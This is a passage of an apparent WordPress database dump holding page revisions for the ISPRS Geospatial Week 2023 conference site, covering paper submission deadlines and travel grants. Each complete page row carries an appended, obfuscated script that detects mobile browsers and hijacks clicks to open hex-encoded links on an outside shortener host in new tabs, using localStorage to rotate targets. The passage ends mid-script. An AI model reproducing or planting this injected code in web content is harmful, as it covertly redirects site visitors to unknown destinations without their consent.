function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-03-30 05:36:50','2023-03-30 05:36:50','',2659,'https://gsw2023.com/?p=3970',0,'revision','',0),
(3971,1,'2023-03-30 05:37:35','2023-03-30 05:37:35','<p>[vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong>Submit Abstracts/Papers</strong></span></p>\n<p>&nbsp;</p>\n<p>The ISPRS Geospatial Week 2023 (GSW’2023) has been opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2023\"> ConfToool website of the Geospatial Week</a>, authors can submit either a full paper or an extended abstract to one of the 26 Workshops available in GSW’2023</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">ISPRS reviewing process</a>. <strong>Note that Full papers should be submitted anonymously</strong><strong>. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</strong></p>\n<p>&nbsp;</p>\n<p>Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\">ISPRS Archives</a>.</p>\n<div class=\"three_quarter first\">\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><span style=\"font-size: 14pt;\"><strong>Important Dates:</strong></span></p>\n<ol>\n<li><span style=\"font-size: 12pt;\"><strong> Annals (Fully Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></li>\n<li>Camera ready paper submission: June 15, 2023 <span style=\"text-decoration: line-through;\">June 1, 2023</span></li>\n<li><strong>Priority well be given to early Submissions</strong></li>\n</ul>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><span style=\"font-size: 12pt;\"><strong> Archives (Abstract Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification: 2023 May 15, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration deadlines</strong></span></p>\n<ul>\n<li>Early bird registration deadline: May 15, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></li>\n<li>Late registration deadline: July 15, 2023 <span style=\"text-decoration: line-through;\">July 1, 2023</span></li>\n</ul>\n<p>&nbsp;</p>\n<p><strong><span style=\"font-size: 14pt;\">Useful links:</span></strong></p>\n<p><a href=\"https://www.conftool.com/gsw2023\">ConfToool website of the Geospatial Week2023</a></p>\n<p><a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">Guidelines for Authors</a></p>\n<p><a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">Reviewing process for ISPRS Events</a></p>\n<p>&nbsp;</p>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-03-30 05:37:35','2023-03-30 05:37:35','',2659,'https://gsw2023.com/?p=3971',0,'revision','',0),
(3972,1,'2023-03-30 06:00:17','2023-03-30 06:00:17','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\" title_font_style=\"font-weight:bold;\"]</p>\n<h5><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023</strong></h5>\n<p>The ISPRS Foundation (TIF) will be offering travel grants to deserving applicants, especially from developing countries, to participate in the <a href=\"https://gsw2023.com/\">Geospatial Week (Egypt GSW’2023)</a>, September 2023, Cairo, Egypt. Please note that The <a href=\"http://www.isprs.org/foundation/Default.aspx\">ISPRS Foundation</a> has limited amount of funds and therefore only limited number of grants will be offered. The following are the important dates for the applicants.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"font-weight: 400;\"></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h4 style=\"font-weight: 400;\"><strong>Important Dates for applicants for travel grants sponsored by The ISPRS Foundation.</strong></h4>\n<ul>\n<li>Applications for travel grants “live” on TIF web site : March 31, 2023</li>\n<li>Deadline for submission of travel grant applications : May 18, 2023</li>\n<li>Decision and notification of successful applicants : June 3, 2023</li>\n<li>Notification of acceptance of travel grant to Operations Officer : July 3, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><strong>Applications can be done through below link,</strong><br />\n<a href=\"https://www.isprs.org/foundation/forms/Travel_Grants.aspx\">https://www.isprs.org/foundation/forms/Travel_Grants.aspx</a></p>\n<h4 class=\"gap-50\"></h4>\n<h4 id=\"respond\"></h4>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 